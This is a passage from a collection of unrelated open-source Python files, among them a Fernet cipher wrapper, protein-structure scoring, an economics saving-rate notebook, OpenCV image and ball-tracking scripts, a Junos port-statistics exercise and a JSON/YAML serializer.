if isinstance(m, PolynomialMotionBlend):
if m.range[1] < offset:
return m.m2
elif m.range[0] < offset:
return m.blend
else:
return _flatten(m.m1, offset)
else:
return m
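
# Illustrative blend of two linear motions (coefficients are made-up values):
# m1(t) = t and m2(t) = 2t - 1 agree with the blend at the segment endpoints,
# with matching velocities, so the composite curve is C1-smooth.
if __name__ == "__main__":
    m1 = PolynomialMotion(offset=0.0, coeffs=[1.0, 0.0])   # x(t) = t
    m2 = PolynomialMotion(offset=0.0, coeffs=[2.0, -1.0])  # x(t) = 2t - 1
    blend = PolynomialMotionBlend(m1, m2, offset=1.0, horizon=1.0)
    print(blend.at(1.0), blend.d_at(1.0))  # matches m1: 1.0, 1.0
    print(blend.at(2.0), blend.d_at(2.0))  # matches m2: 3.0, 2.0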
# File: wisper/encryption.py (repo: parkerduckworth/wisper)
from cryptography.fernet import Fernet, InvalidToken
class Cipher(object):
"""Message cipher for Client instances
fernet_key: (Fernet) Symmetric encryption object. Can only decrypt data
that has been encrypted with a cipher created using a matching
secret key
"""
def __init__(self, secret_key):
self.fernet_key = Fernet(secret_key)
def encrypt(self, token):
cipher_text = self.fernet_key.encrypt(token)
return cipher_text
def decrypt(self, token):
plain_text = self.fernet_key.decrypt(token)
return plain_text
def is_encrypted(self, token):
"""Check if token is encrypted
If token cannot be decrypted, it is assumed to be unencrypted
"""
try:
self.fernet_key.decrypt(token)
return True
except InvalidToken:
return False
def generate_secret_key():
"""Generate new secret key"""
secret_key = Fernet.generate_key()
return secret_key
# Reassign so cryptography.fernet module only needs to be imported here
InvalidToken = InvalidToken
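
# Minimal round-trip sketch (the key and message below are illustrative):
if __name__ == "__main__":
    key = generate_secret_key()
    cipher = Cipher(key)
    token = cipher.encrypt(b"hello")
    assert cipher.is_encrypted(token)
    assert cipher.decrypt(token) == b"hello"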
# File: src/get_gdt.py (repo: yutake27/HMDM)
import subprocess
import argparse
from pathlib import Path
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
def parse_TMscore(result):
lines = result.split('\n')
for line in lines:
line_split = line.split()
if len(line_split) == 0:
continue
elif line_split[0] == 'TM-score':
tmscore = float(line_split[2])
elif line_split[0] == 'GDT-TS-score=':
gdtts = line_split[1]
elif line_split[0] == 'GDT-HA-score=':
gdtha = line_split[1]
return tmscore, gdtts, gdtha
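
# The parser above keys off output lines of the following shapes (reconstructed
# from the parsing logic; actual TMscore output may differ in spacing):
#   TM-score    = 0.7431  ...
#   GDT-TS-score= 0.6852 ...
#   GDT-HA-score= 0.5120 ...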
def run_TMscore(native_pdb, model_pdb):
cmd = ['TMscore', model_pdb, native_pdb, '-outfmt', '-1']
result = subprocess.check_output(cmd)
return result.decode('utf-8')
def get_gdt(native_pdb, model_pdb):
result = run_TMscore(native_pdb, model_pdb)
tmscore, gdtts, gdtha = parse_TMscore(result)
return tmscore, gdtts, gdtha
def get_gdt_for_target(native_pdb_path, model_pdb_dir, blast_xml_csv_path, out_gdt_path):
model_array = []
tmscore_array = []
gdtts_array = []
gdtha_array = []
for model in model_pdb_dir.iterdir():
model_array.append(model.stem)
tmscore, gdtts, gdtha = get_gdt(native_pdb_path, model)
tmscore_array.append(tmscore)
gdtts_array.append(gdtts)
gdtha_array.append(gdtha)
df = pd.DataFrame({'TMscore': tmscore_array, 'GDT_TS': gdtts_array, 'GDT_HA': gdtha_array}, index=model_array)
df = df.astype('float')
df = df.sort_index()
df['target'] = [index.rsplit('_', 4)[0] for index in df.index]
df['template'] = [index.split('_', 2)[2].rsplit('_', 1)[0] for index in df.index]
df_template = pd.read_csv(blast_xml_csv_path, index_col=0)
df = pd.merge(df, df_template, left_on='template', right_index=True, how='left')
df.to_csv(out_gdt_path)
def get_gdt_for_target_df(native_pdb_path, model_pdb_dir, blast_xml_csv_path) -> pd.DataFrame:
model_array = []
tmscore_array = []
gdtts_array = []
gdtha_array = []
for model in model_pdb_dir.iterdir():
model_array.append(model.stem)
tmscore, gdtts, gdtha = get_gdt(native_pdb_path, model)
tmscore_array.append(tmscore)
gdtts_array.append(gdtts)
gdtha_array.append(gdtha)
df = pd.DataFrame({'TMscore': tmscore_array, 'GDT_TS': gdtts_array, 'GDT_HA': gdtha_array}, index=model_array)
df = df.astype('float')
df = df.sort_index()
df['target'] = [index.rsplit('_', 4)[0] for index in df.index]
df['template'] = [index.split('_', 2)[2].rsplit('_', 1)[0] for index in df.index]
df_template = pd.read_csv(blast_xml_csv_path, index_col=0)
df = pd.merge(df, df_template, left_on='template', right_index=True, how='left')
return df
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('target', type=str, help='target name')
parser.add_argument('--blastdb', '-b', type=str, help='blastdb name', default='pdbaa_20200712')
parser.add_argument('--dataset_name', '-d', type=str, help='name of the dataset', default='target_10')
args = parser.parse_args()
native_pdb = (Path('../native_pdb') / args.dataset_name / args.target).with_suffix('.pdb')
model_pdb_dir = Path('../pdb')/args.dataset_name/args.target
df_template_path = (Path('../blast_xml') / args.blastdb / args.dataset_name / args.target).with_suffix('.csv')
out_dir = Path('../tmscore') / args.dataset_name
out_dir.mkdir(parents=True, exist_ok=True)
out_path = (out_dir/args.target).with_suffix('.csv')
get_gdt_for_target(native_pdb, model_pdb_dir, df_template_path, out_path)
# File: notebooks/Uncertainty-and-the-Saving-Rate.py (repo: JackShiqiLi/DemARK)
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.2'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown]
# # Uncertainty and Saving in Partial Equilibrium
#
# [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/econ-ark/DemARK/master?filepath=notebooks%2FUncertainty-and-the-Saving-Rate.ipynb)
#
# Saving rates vary widely across countries, but there is no consensus about the main causes of those differences.
#
# One commonly mentioned factor is differences across countries in the degree of uncertainty that individuals face, which should induce different amounts of precautionary saving.
#
# Uncertainty might differ for "fundamental" reasons, having to do with, say, the volatility of demand for the goods and services supplied by the country, or might differ as a result of economic policies, such as the strucutre of the social insurance system.
#
# A challenge in evaluating the importance of precautionary motives for cross-country saving differences has been a lack of consensus about what measures of uncertainty ought, in principle, to be the right ones to look at in any attempt to measure a relationship between uncertainty and saving.
#
# This notebook uses [a standard model](https://econ.jhu.edu/people/ccarroll/papers/cstwMPC) <cite data-cite="6202365/7MR8GUVS"></cite> to construct a theoretical benchmark for the relationship of saving to two kinds of uncertainty: Permanent shocks and transitory shocks to income.
#
# Conclusions:
# 1. The model implies a close to linear relationship between the variance of either kind of shock (transitory or permanent) and the saving rate
# 2. The _slope_ of that relationship is much steeper for permanent than for transitory shocks
# * Over ranges of values calibrated to be representative of microeconomically plausible magnitudes
#
# Thus, the quantitative theory of precautionary saving says that the principal determinant of precautionary saving should be the magnitude of permanent (or highly persistent) shocks to income.
#
# (Because the result was obtained in a partial equilibrium model, the conclusion applies also to attempts to measure the magnitude of precautionary saving across groups of people who face different degrees of uncertainty within a country).
#
# @authors: <NAME>, <NAME>, <NAME>
# %% {"code_folding": [0, 11]}
# Boring non-HARK setup stuff
Generator = True # This notebook can be used as a source for generating derivative notebooks
nb_name = 'Uncertainty-and-the-Saving-Rate'
# This is a jupytext paired notebook that autogenerates BufferStockTheory.py
# which can be executed from a terminal command line via "ipython BufferStockTheory.py"
# But a terminal does not permit inline figures, so we need to test jupyter vs terminal
# Google "how can I check if code is executed in the ipython notebook"
from IPython import get_ipython # In case it was run from python instead of ipython
def in_ipynb():
try:
if str(type(get_ipython())) == "<class 'ipykernel.zmqshell.ZMQInteractiveShell'>":
return True
else:
return False
except NameError:
return False
# Determine whether to make the figures inline (for spyder or jupyter)
# vs whatever is the automatic setting that will apply if run from the terminal
if in_ipynb():
# %matplotlib inline generates a syntax error when run from the shell
# so do this instead
get_ipython().run_line_magic('matplotlib', 'inline')
else:
get_ipython().run_line_magic('matplotlib', 'auto')
print('You appear to be running from a terminal')
print('By default, figures will appear one by one')
print('Close the visible figure in order to see the next one')
# Import the plot-figure library matplotlib
import matplotlib.pyplot as plt
# In order to use LaTeX to manage all text layout in our figures, we import rc settings from matplotlib.
from matplotlib import rc
plt.rc('font', family='serif')
# LaTeX is huge and takes forever to install on mybinder
# so if it is not installed then do not use it
from distutils.spawn import find_executable
iflatexExists=False
if find_executable('latex'):
iflatexExists=True
plt.rc('font', family='serif')
plt.rc('text', usetex=iflatexExists)
# The warnings package allows us to ignore some harmless but alarming warning messages
import warnings
warnings.filterwarnings("ignore")
# The tools for navigating the filesystem
import sys
import os
sys.path.insert(0, os.path.abspath('../lib')) # directory is one down from root
from copy import copy, deepcopy
# Define (and create, if necessary) the figures directory "Figures"
if Generator:
nb_file_path = os.path.dirname(os.path.abspath(nb_name+".ipynb")) # Find pathname to this file:
FigDir = os.path.join(nb_file_path,"Figures/") # LaTeX document assumes figures will be here
# FigDir = os.path.join(nb_file_path,"/tmp/Figures/") # Uncomment to make figures outside of git path
if not os.path.exists(FigDir):
os.makedirs(FigDir)
from copy import deepcopy
from scipy.optimize import golden, brentq
from time import perf_counter as clock  # time.clock was removed in Python 3.8
import numpy as np
import scipy as sp
# %% {"code_folding": [0]}
# Import HARK tools and cstwMPC parameter values
from HARK.utilities import plotFuncsDer, plotFuncs
from HARK.ConsumptionSaving.ConsIndShockModel import PerfForesightConsumerType
import HARK.cstwMPC.cstwMPC as cstwMPC
import HARK.cstwMPC.SetupParamsCSTW as Params
# Double the default value of variance
# Params.init_infinite['PermShkStd'] = [i*2 for i in Params.init_infinite['PermShkStd']]
# %% {"code_folding": [0]}
# Setup stuff for general equilibrium version
# Set targets for K/Y and the Lorenz curve
lorenz_target = cstwMPC.getLorenzShares(Params.SCF_wealth,weights=
Params.SCF_weights,percentiles=
Params.percentiles_to_match)
lorenz_long_data = np.hstack((np.array(0.0),\
cstwMPC.getLorenzShares(Params.SCF_wealth,weights=\
Params.SCF_weights,percentiles=\
np.arange(0.01,1.0,0.01).tolist()),np.array(1.0)))
KY_target = 10.26
# %% {"code_folding": [0]}
# Setup and calibration of the agent types
# The parameter values below are taken from
# http://econ.jhu.edu/people/ccarroll/papers/cjSOE/#calibration
Params.init_cjSOE = Params.init_infinite # Get default values of all parameters
# Now change some of the parameters for the individual's problem to those of cjSOE
Params.init_cjSOE['CRRA'] = 2
Params.init_cjSOE['Rfree'] = 1.04**0.25
Params.init_cjSOE['PermGroFac'] = [1.01**0.25] # Indiviual-specific income growth (from experience, e.g.)
Params.init_cjSOE['PermGroFacAgg'] = 1.04**0.25 # Aggregate productivity growth
Params.init_cjSOE['LivPrb'] = [0.95**0.25] # Matches a short working life
PopGroFac_cjSOE = [1.01**0.25] # Irrelevant to the individual's choice; attach later to "market" economy object
# Instantiate the baseline agent type with the parameters defined above
BaselineType = cstwMPC.cstwMPCagent(**Params.init_cjSOE)
BaselineType.AgeDstn = np.array(1.0) # Fix the age distribution of agents
# Make desired number of agent types (to capture ex-ante heterogeneity)
EstimationAgentList = []
for n in range(Params.pref_type_count):
EstimationAgentList.append(deepcopy(BaselineType))
EstimationAgentList[n].seed = n # Give every instance a different seed
# %% {"code_folding": [0]}
# Make an economy for the consumers to live in
EstimationEconomy = cstwMPC.cstwMPCmarket(**Params.init_market)
EstimationEconomy.print_parallel_error_once = True # Avoids a bug in the code
EstimationEconomy.agents = EstimationAgentList
EstimationEconomy.act_T = Params.T_sim_PY # How many periods of history are good enough for "steady state"
# %% {"code_folding": [0]}
# Uninteresting parameters that also need to be set
EstimationEconomy.KYratioTarget = KY_target
EstimationEconomy.LorenzTarget = lorenz_target
EstimationEconomy.LorenzData = lorenz_long_data
EstimationEconomy.PopGroFac = PopGroFac_cjSOE # Population growth characterizes the entire economy
EstimationEconomy.ignore_periods = Params.ignore_periods_PY # Presample periods
#Display statistics about the estimated model (or not)
EstimationEconomy.LorenzBool = False
EstimationEconomy.ManyStatsBool = False
EstimationEconomy.TypeWeight = [1.0]
# %% {"code_folding": [0]}
# construct spread_estimate and center_estimate if true, otherwise use the default values
Params.do_param_dist=True # Whether to use a distribution of ex-ante heterogeneity
# Discount factors assumed to be uniformly distributed around center_pre for spread_pre on either side
spread_pre=0.0019501105739768 #result under the default calibration of cjSOE
center_pre=1.0065863855906343 #result under the default calibration of cjSOE
do_optimizing=False # Set to True to reestimate the distribution of time preference rates
if do_optimizing: # If you want to rerun the cstwMPC estimation, change do_optimizing to True
# Finite value requires discount factor from combined pure and mortality-induced
# discounting to be less than one, so maximum DiscFac is 1/LivPrb
DiscFacMax = 1/Params.init_cjSOE['LivPrb'][0] #
param_range = [0.995,-0.0001+DiscFacMax]
spread_range = [0.00195,0.0205] #
if Params.do_param_dist: # If configured to estimate the distribution
LorenzBool = True
# Run the param-dist estimation
paramDistObjective = lambda spread : cstwMPC.findLorenzDistanceAtTargetKY(
Economy = EstimationEconomy,
param_name = Params.param_name,
param_count = Params.pref_type_count,
center_range = param_range,
spread = spread,
dist_type = Params.dist_type) # Distribution of DiscFac
t_start = clock()
spread_estimate = golden(paramDistObjective
,brack=spread_range
,tol=1e-4)
center_estimate = EstimationEconomy.center_save
t_end = clock()
else: # Run the param-point estimation only
paramPointObjective = lambda center : cstwMPC.getKYratioDifference(Economy = EstimationEconomy,
param_name = Params.param_name,
param_count = Params.pref_type_count,
center = center,
spread = 0.0,
dist_type = Params.dist_type)
t_start = clock()
center_estimate = brentq(paramPointObjective # Find best point estimate
,param_range[0]
,param_range[1],xtol=1e-6)
spread_estimate = 0.0
t_end = clock()
print(spread_estimate)
print('****************')
print(center_estimate)
print('****************')
else: # Just use the hard-wired numbers from cstwMPC
center_estimate=center_pre
spread_estimate=spread_pre
# %% {"code_folding": [0]}
# Construct the economy at date 0
EstimationEconomy.distributeParams( # Construct consumer types whose heterogeneity is in the given parameter
'DiscFac',
Params.pref_type_count,# How many different types of consumer are there
center_estimate, # Increase patience slightly vs cstwMPC so that maximum saving rate is higher
spread_estimate, # How much difference is there across consumers
Params.dist_type) # Default is for a uniform distribution
# %% {"code_folding": [0]}
# Function to calculate the saving rate of a cstw economy
def calcSavRte(Economy,ParamToChange,NewVals):
'''
Calculates the saving rate as income minus consumption divided by income.
Parameters
----------
Economy : [cstwMPCmarket]
A fully-parameterized instance of a cstwMPCmarket economy
ParamToChange : string
Name of the parameter that should be varied from the original value in Economy
NewVals : [float] or [list]
The alternative value (or list of values) that the parameter should take
Returns
-------
savRte : [float]
The aggregate saving rate in the last year of the generated history
'''
for NewVal in NewVals:
if ParamToChange in ["PermShkStd","TranShkStd"]:
ThisVal = [NewVal]
else:
ThisVal = NewVal # If they asked to change something else, assume it's a scalar
for j in range(len(Economy.agents)): # For each agent, set the new parameter value
setattr(Economy.agents[j],ParamToChange,ThisVal)
cstwMPC.cstwMPCagent.updateIncomeProcess(Economy.agents[j])
Economy.solve()
C_NrmNow=[]
A_NrmNow=[]
M_NrmNow=[]
for j in range (len(Economy.agents)): # Combine the results across all the agents
C_NrmNow=np.hstack((C_NrmNow,Economy.agents[j].cNrmNow))
A_NrmNow=np.hstack((A_NrmNow,Economy.agents[j].aNrmNow))
M_NrmNow=np.hstack((M_NrmNow,Economy.agents[j].mNrmNow))
CAgg=np.sum(np.hstack(Economy.pLvlNow)*C_NrmNow) # cNrm times pLvl = level of c; sum these for CAgg
AAgg=np.sum(np.hstack(Economy.pLvlNow)*A_NrmNow) # Aggregate Assets
MAgg=np.sum(np.hstack(Economy.pLvlNow)*M_NrmNow) # Aggregate Market Resources
YAgg=np.sum(np.hstack(Economy.pLvlNow)*np.hstack(Economy.TranShkNow)) # Aggregate Labor Income
BAgg=MAgg-YAgg # Aggregate "Bank Balances" (at beginning of period; before consumption decision)
IncAgg=(BaselineType.Rfree-1)*BAgg+YAgg # Interest income plus noninterest income
savRte=(IncAgg-CAgg)/IncAgg # Unspent income divided by the level of income
return savRte
# %% {"code_folding": [0]}
# Function to plot relationship between x and y; x is the parameter varied and y is saving rate
def plotReg(x,y,xMin,xMax,yMin,yMax,xLbl,yLbl,Title,fileName):
# Result_data_path = os.path.join(Folder_path,'SavingVSPermShr_Youth_MPC_15.png')
plt.ylabel(yLbl)
plt.xlabel(xLbl)
plt.title(Title)
plt.xlim(xMin,xMax)
plt.ylim(yMin,yMax)
plt.scatter(x,y)
# Draw the linear fitted line
m, b = np.polyfit(x, y, 1)
# plt.plot(x, m*np.asarray(x) + b, '-')
if Generator:
plt.savefig(FigDir + nb_name + '-' + fileName + '.png')
plt.savefig(FigDir + nb_name + '-' + fileName + '.svg')
plt.savefig(FigDir + nb_name + '-' + fileName + '.pdf')
slope, intercept, r_value, p_value, std_err = sp.stats.linregress(x,y)
print('Slope=' + str(slope) + ', intercept=' + str(intercept) + ', r_value=' + str(r_value) + ', p_value=' + str(p_value)+', std=' + str(std_err))
# %% {"code_folding": [0]}
# Proportion of base value for uncertainty parameter to take (up to 1 = 100 percent)
# Do not go above one to avoid having to worry about whether the most patient consumer violates the
# Growth Impatience Condition (https://econ.jhu.edu/people/ccarroll/papers/BufferStockTheory/#GIC)
bottom=0.5
points=np.arange(bottom,1.+0.025,0.025)
# %% {"code_folding": [0]}
# Calculate variance of permanent shock vs saving measures
savRteList = []
KtoYList = []
pVarList = []
pVarBase = BaselineType.PermShkStd[0] ** 2
for pVar in points * pVarBase:
pVarList.append(pVar) # Variance is square of standard deviation
pStd = pVar ** 0.5
# print(pStd)
savRteList.append(calcSavRte(EstimationEconomy,"PermShkStd",[pStd]))
KtoYList.append(0.25*np.mean(np.array(EstimationEconomy.KtoYnow_hist)[EstimationEconomy.ignore_periods:]))
# %% {"code_folding": [0]}
# Calculate how much net worth shrinks when permanent variance is halved
ShrinksBy = KtoYList[1]/KtoYList[-1]
print('Halving the magnitude of the permanent variance causes target wealth to fall to %1.3f' % ShrinksBy)
print('of its original value.')
# %% {"code_folding": [0]}
# Plot pVar vs saving measures
plotReg(pVarList,savRteList,
xMin=pVarList[1]-0.0002,xMax=pVarList[-1]+0.0002,yMin=savRteList[1]-0.01,yMax=savRteList[-1]+0.01,
xLbl=r'Variance of Permanent Shocks, $\sigma^{2}_{\psi}$',
yLbl='Aggregate Saving Rate',
Title='Uncertainty vs Saving',
fileName='savRtevsPermShkVar'
)
plt.show(block=False)
plotReg(pVarList,KtoYList,
xMin=pVarList[1]-0.0002,xMax=pVarList[-1]+0.0002,yMin=1.7,yMax=KtoYList[-1]+0.1,
xLbl=r'Variance of Permanent Shocks, $\sigma^{2}_{\psi}$',
yLbl='Net Worth/Income',
Title='Uncertainty vs Net Worth Ratio',
fileName='BvsPermShkVar'
)
plt.ylabel('Net Worth/Income')
plt.xlabel(r'Variance of Permanent Shocks, $\sigma^{2}_{\psi}$')
plt.title('Uncertainty vs Net Worth Ratio',fontsize=16)
plt.xlim(pVarList[1]-0.0002,pVarList[-1]+0.0002)
plt.ylim(1.6,KtoYList[-1]+0.1)
plt.scatter(pVarList,KtoYList)
plt.xticks([pVarList[1],pVarList[-1]],[r'$\bar{\sigma}^{2}_{\psi}/2$',r'$\bar{\sigma}^{2}_{\psi}$'])
fileName='BvsPermShkVar'
if Generator:
plt.savefig(FigDir + nb_name + '-' + fileName + '.png')
plt.savefig(FigDir + nb_name + '-' + fileName + '.svg')
plt.savefig(FigDir + nb_name + '-' + fileName + '.pdf')
plt.show(block=False)
# %% {"code_folding": [0]}
# Calculate variance of transitory shock vs saving measures
# Restore benchmark solution
EstimationEconomy.distributeParams( # Construct consumer types whose heterogeneity is in the given parameter
'DiscFac',
Params.pref_type_count,# How many different types of consumer are there
center_estimate, # Increase patience slightly vs cstwMPC so that maximum saving rate is higher
spread_estimate, # How much difference is there across consumers
Params.dist_type) # Default is for a uniform distribution
EstimationEconomy.solve()
savRteList_Tran = []
KtoYList_Tran = []
tVarList = []
tVarBase = BaselineType.TranShkStd[0] ** 2
for tVar in points * tVarBase:
tVarList.append(tVar) # Variance is std squared
savRteList_Tran.append(calcSavRte(EstimationEconomy,"TranShkStd",[tVar ** 0.5]))
KtoYList_Tran.append(0.25*np.mean(np.array(EstimationEconomy.KtoYnow_hist)[EstimationEconomy.ignore_periods:]))
# %% {"code_folding": [0]}
# Plot transitory variance versus saving measures
plotReg(tVarList,savRteList_Tran,
xMin=tVarList[1]-0.001,xMax=tVarList[-1]+0.001,yMin=savRteList[1]-0.01,yMax=savRteList[-1]+0.01,
xLbl=r'Variance of Transitory Shocks, $\sigma^{2}_{\theta}$',
yLbl='Aggregate Saving Rate',
Title='Uncertainty vs Saving',
fileName='savRteVSTranShkVar'
)
plt.show(block=False)
plotReg(tVarList,KtoYList_Tran,
xMin=tVarList[1]-0.001,xMax=tVarList[-1]+0.001,yMin=savRteList[1]-0.01,yMax=KtoYList[-1]+0.1,
xLbl=r'Variance of Permanent Shocks, $\sigma^{2}_{\psi}$',
yLbl='Net Worth/Income',
Title='Uncertainty vs Net Worth Ratio',
fileName='BvsTranShkVar'
)
plt.show(block=False)
# File: Image_to_Sketch/Pencil sketch.py (repo: theAdarshSrivastava/OpenCv)
import cv2
def img2sketch(photo, k_size):
#Read Image
img=cv2.imread(photo)
# Convert to Grey Image
grey_img=cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Invert Image
invert_img=cv2.bitwise_not(grey_img)
#invert_img=255-grey_img
# Blur image
blur_img=cv2.GaussianBlur(invert_img, (k_size,k_size),0)
# Invert Blurred Image
invblur_img=cv2.bitwise_not(blur_img)
#invblur_img=255-blur_img
# Sketch Image
sketch_img=cv2.divide(grey_img,invblur_img, scale=256.0)
# Save Sketch
cv2.imwrite('sketch.jpg', sketch_img)
# Display sketch
cv2.imshow('sketch image',sketch_img)
cv2.waitKey(0)
cv2.destroyAllWindows()
#Function call
img2sketch(photo='d.jpg', k_size=111)
# File: virtual/lib/python3.8/site-packages/setuptools/_itertools.py (repo: Jamesmwangi245/flask-3)
from setuptools.extern.more_itertools import consume  # noqa: F401
# copied from jaraco.itertools 6.1
def ensure_unique(iterable, key=lambda x: x):
"""
Wrap an iterable to raise a ValueError if non-unique values are encountered.
>>> list(ensure_unique('abc'))
['a', 'b', 'c']
>>> consume(ensure_unique('abca'))
Traceback (most recent call last):
...
ValueError: Duplicate element 'a' encountered.
"""
seen = set()
seen_add = seen.add
for element in iterable:
k = key(element)
if k in seen:
raise ValueError(f"Duplicate element {element!r} encountered.")
seen_add(k)
yield element
# File: process_video.py (repo: ckjellson/tt_tracker)
import cv2
cv2.setUseOptimized(True)
import numpy as np
import time
'''
Functions for ball detection in each frame of a video
'''
test = False # Used to test functions for improvement
fgbg = cv2.createBackgroundSubtractorMOG2(history=15,varThreshold=50, detectShadows=False)
kernel = np.ones((2,2),np.uint8)
# Setup SimpleBlobDetector parameters.
params = cv2.SimpleBlobDetector_Params()
# Change thresholds
params.minThreshold = 50
# Filter by Color.
params.filterByColor = True
params.blobColor = 255
# Filter by Area.
params.filterByArea = True
params.minArea = 30
# Filter by Circularity
params.filterByCircularity = True
params.minCircularity = 0.75
# Filter by Convexity
params.filterByConvexity = True
params.minConvexity = 0.9
# Filter by Inertia
params.filterByInertia = True
params.minInertiaRatio = 0.08
# Create a detector with the parameters
detector = cv2.SimpleBlobDetector_create(params)
def read_video(path,flipped):
'''
Main function
Args:
path (str): path to video
flipped (bool): true if a video is read in upside-down
Returns:
height (int): height of video frames
width (int): width of video frames
ball_pos (np.array): detected positions of balls in each frame
fps (int): frames per second
'''
cap = cv2.VideoCapture(path)
nbr_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(cap.get(cv2.CAP_PROP_FPS))
height, width, ball_pos = track_ball(cap, nbr_frames,flipped)
cap.release()
cv2.destroyAllWindows()
for i in range(ball_pos.shape[0]):
ball_pos[i, 1] = height - ball_pos[i, 1]-1
return height, width, ball_pos, fps
# Creates trace of ball in image
def track_ball(cap,nbr_frames,flipped):
'''
:param cap: Video object
:param nbr_frames: Number of frames
:param flipped: true if video flipped
:return: video height,width and detected ball positions
'''
ball_pos = np.ones([nbr_frames,3])
height = 0
width = 0
# Iterate through frames
for i in range(nbr_frames):
ret, frame = cap.read()
if flipped:
frame = cv2.flip(frame,0)
frame = cv2.flip(frame,1)
if i==0:
height,width,channels = frame.shape
if ret:
if width>1280:
frame = cv2.resize(frame, (int(frame.shape[1]/2), int(frame.shape[0]/2)), interpolation=cv2.INTER_AREA)
ball_pos[i,0:2] = find_ball(frame, height, width)*2
else:
ball_pos[i, 0:2] = find_ball(frame, height, width)
if i%100==0:
print(str(i) + ' / ' + str(nbr_frames))
return height, width, ball_pos
# Finds ball position in orig
def find_ball(frame,height,width):
'''
:param frame:
:param height:
:param width:
:return: pos: 2D position of detected ball ([0,0] if none detected)
'''
gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
# t1 = time.time()
gray[cv2.medianBlur(fgbg.apply(frame),ksize=5)==0] = 0
# t2 = time.time()
keypoints = detector.detect(gray)
# t3 = time.time()
# print('fgbg:'+str(t2-t1))
# print('detector:'+str(t3-t2))
if test:
im_with_keypoints = cv2.drawKeypoints(gray, keypoints, np.array([]), (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
cv2.imshow('', im_with_keypoints)
cv2.waitKey()
col = 0
row = 0
if len(keypoints)>0:
maxval = 0
for i in range(len(keypoints)):
x = int(keypoints[i].pt[0])
y = int(keypoints[i].pt[1])
val = np.sum(gray[max([y-3,0]):min([y+3,height-1]),max([x-3,0]):min([x+3,width-1])])
if val>maxval:
col = x
row = y
maxval = val
pos = np.array([col, row])
if test:
framecopy = np.copy(frame)
cv2.circle(framecopy, (col, row), 10, color=(0,255,0), thickness=4)
cv2.imshow('gray', framecopy)
cv2.waitKey()
return pos
if test:
vidpath = 'videos/outside2.mp4'
flipped = False
height,width,ballpos,fps = read_video(vidpath,flipped) | 3 | 3 |
pythonFiles/tests/testing_tools/adapter/.data/complex/mod.py | AlbertDeFusco/vscode-python | 2,461 | 12759570 | <reponame>AlbertDeFusco/vscode-python
"""
Examples:
>>> square(1)
1
>>> square(2)
4
>>> square(3)
9
>>> spam = Spam()
>>> spam.eggs()
42
"""
def square(x):
"""
Examples:
>>> square(1)
1
>>> square(2)
4
>>> square(3)
9
"""
return x * x
class Spam(object):
"""
Examples:
>>> spam = Spam()
>>> spam.eggs()
42
"""
def eggs(self):
"""
Examples:
>>> spam = Spam()
>>> spam.eggs()
42
"""
return 42
| 3.15625 | 3 |
class10/exercise2.py | gleydsonm/pynet_ex | 0 | 12759571 | <gh_stars>0
#!/usr/bin/env python
'''
Exercise 2 - class 10
'''
from jnpr.junos import Device
from jnpr.junos import exception
from jnpr.junos.op.ethport import EthPortTable
from getpass import getpass
import sys
HOST = '172.16.31.10'
USER = 'pyclass'
PWD = getpass()
def remote_conn(hst, usr, pwd):
'''
Open the remote connection to the device
'''
try:
dev = Device(host=hst, user=usr, password=pwd)
o_dev = dev.open()
except exception.ConnectAuthError:
        print('Incorrect username or password')
return False
return o_dev
def main():
'''
Main function
'''
a_device = remote_conn(HOST, USER, PWD)
if not a_device:
sys.exit('Fix the above errors. Exiting...')
ports = EthPortTable(a_device)
ports.get()
for port in ports.keys():
        print(port)
        port_items = dict(ports[port].items())
        print('  Oper: %s' % (port_items['oper']))
        print('  rx: %s' % (port_items['rx_packets']))
        print('  tx: %s' % (port_items['tx_packets']))
        print()
if __name__ == '__main__':
main()
| 2.78125 | 3 |
6_kombinationen/loopRandom/StarrySky.py | Coding-for-the-Arts/drawbot-samples | 0 | 12759572 | <gh_stars>0
"""
Random St<NAME>
"""
newPage(300, 300)
fill(0)
rect(0, 0, 300, 300)
for i in range(200):
dia = random() * 3
fill(random())
oval(random()*300, random()*300, dia, dia)
"""
Aufgabe:
- Platziere ein paar zufällig farbige Planeten am Nachthimmel
- Was passiert, wenn du Zeile 13 zu oval(dia, dia, dia, dia) änderst?
- Warum braucht es für die x- und y-Position seperate Zufallswerte?
"""
| 3.09375 | 3 |
biothings/utils/serializer.py | newgene/biothings.api | 0 | 12759573 | <gh_stars>0
import datetime
from collections import OrderedDict, UserString, UserDict, UserList
from urllib.parse import parse_qs, unquote_plus, urlencode, urlparse, urlunparse
import orjson
import yaml
def to_json_0(data):
'''deprecated'''
import json
from biothings.utils.common import BiothingsJSONEncoder
return json.dumps(data, cls=BiothingsJSONEncoder)
def orjson_default(o):
'''The default function passed to orjson to serialize non-serializable objects'''
if isinstance(o, (UserDict, UserList)):
        return o.data  # o.data is the underlying dict or list that stores the data
raise TypeError(f"Type {type(o)} not serializable")
def to_json(data, indent=False, sort_keys=False):
# default option:
# OPT_NON_STR_KEYS: non string dictionary key, e.g. integer
# OPT_NAIVE_UTC: use UTC as the timezone when it's missing
option = orjson.OPT_NON_STR_KEYS | orjson.OPT_NAIVE_UTC
if indent:
option |= orjson.OPT_INDENT_2
if sort_keys:
option |= orjson.OPT_SORT_KEYS
return orjson.dumps(data, default=orjson_default, option=option).decode()
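# Usage sketch (illustrative, not part of the original module):
#
#   >>> import datetime
#   >>> to_json({1: "int key", "ts": datetime.datetime(2021, 1, 1)})
#   '{"1":"int key","ts":"2021-01-01T00:00:00+00:00"}'
#
# The integer key is accepted because of OPT_NON_STR_KEYS, and the naive
# datetime is serialized as UTC because of OPT_NAIVE_UTC.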
def to_yaml(data, stream=None, Dumper=yaml.SafeDumper, default_flow_style=False):
# Author: <NAME>
class OrderedDumper(Dumper):
pass
def _dict_representer(dumper, data):
return dumper.represent_mapping(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
data.items())
OrderedDumper.add_representer(OrderedDict, _dict_representer)
